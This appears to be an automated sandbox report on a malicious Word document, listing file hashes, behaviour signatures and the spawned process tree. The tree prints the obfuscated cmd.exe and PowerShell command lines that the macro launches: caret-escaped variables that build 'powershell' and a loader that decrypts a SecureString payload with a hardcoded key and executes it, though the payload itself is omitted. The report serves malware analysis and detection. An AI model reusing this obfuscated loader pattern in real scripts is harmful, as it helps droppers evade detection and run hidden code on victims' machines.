Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
  • submitted
    25-05-2024 18:43

General

  • Target

    72e69b0bbd5fb4d0d83a7fe4fe8f1234_JaffaCakes118.doc

  • Size

    195KB

  • MD5

    72e69b0bbd5fb4d0d83a7fe4fe8f1234

  • SHA1

    2ee022c7b7e85dce006c19a963fcdbae2b0c85da

  • SHA256

    5b9bce29afccc2b7c343b74f571061dd8c148a162849b1263913f549a5f14ce0

  • SHA512

    5634d571ecf9c1f67d05c4d3ec934b5970292fcc34765c99fe6d91f4270e09d9ae9becd9f4d661f19bcaa24c97cb1122eae852a483c2746c674732dd11d545c6

  • SSDEEP

    3072:cgn/iKFBaqCHonM8VIGNsmBGorUKqkr+1NPnjnw8WKzR:cg/iQBacxNsmBGo4dkruBnjw8

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\72e69b0bbd5fb4d0d83a7fe4fe8f1234_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1544
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3024
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" YHlNCRaMuFaDT iFHuAKCifprwwAmRsKw YzdoijvuUPa & %^C^o^m^S^p^E^c^% %^C^o^m^S^p^E^c^% /V /c set %zTOpZSzwuUrzNKL%=FmcpqXGKjQdocU&&set %JwmDJiiw%=p&&set %VVvAbUYhRzWLA%=o^w&&set %PbRZwIkZzuwSmlv%=SrZtnlthiZMDG&&set %TESkLfMR%=!%JwmDJiiw%!&&set %IoLUZEPfoOCPfoh%=XlUPuzmPihiik&&set %JQjTXiIwH%=e^r&&set %WfJPszLzNRcJXq%=!%VVvAbUYhRzWLA%!&&set %cTBUOhlq%=s&&set %uWvjToFnwMhjJic%=iHwLpHnroL&&set %iYnlXDfjwztpzJ%=he&&set %dndPGSiZOoY%=ll&&!%TESkLfMR%!!%WfJPszLzNRcJXq%!!%JQjTXiIwH%!!%cTBUOhlq%!!%iYnlXDfjwztpzJ%!!%dndPGSiZOoY%! " .( $eNv:COmspEc[4,24,25]-JOIn'')( ( [runTime.iNterOPSERvIces.mArSHAL]::ptRtOSTRINgaNSi([RUntime.iNteRoPSeRvICeS.MArShaL]::SECurEStrInGtOglObaLAllocAnSi($('[encoded payload omitted]'| cONvERTto-SecURESTRING -KEy 172,5,138,199,147,157,132,126,84,135,12,101,187,119,252,98,95,45,151,67,128,60,158,229) ) ) ) )
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell " .( $eNv:COmspEc[4,24,25]-JOIn'')( ( [runTime.iNterOPSERvIces.mArSHAL]::ptRtOSTRINgaNSi([RUntime.iNteRoPSeRvICeS.MArShaL]::SECurEStrInGtOglObaLAllocAnSi($('[encoded payload omitted]'| cONvERTto-SecURESTRING -KEy 172,5,138,199,147,157,132,126,84,135,12,101,187,119,252,98,95,45,151,67,128,60,158,229) ) ) ) )
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2400

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4ae41fc3b952c5c9de8ac18079474c3b

      SHA1

      a4675fcaf00e06c9ffc978eb236c51d8aff29726

      SHA256

      861309bb2a10dba145ab19e5dc42cdb0439567cc16e96ff8866db92a150b1932

      SHA512

      c6e3ff2fea327eff673750db7fc5354e91131ab26dc3ff597ed600c77ff5027c25e5c1c057b14cc08d33105cf03fcd0ef4a7c68280192627a5b89f0a41874eb9
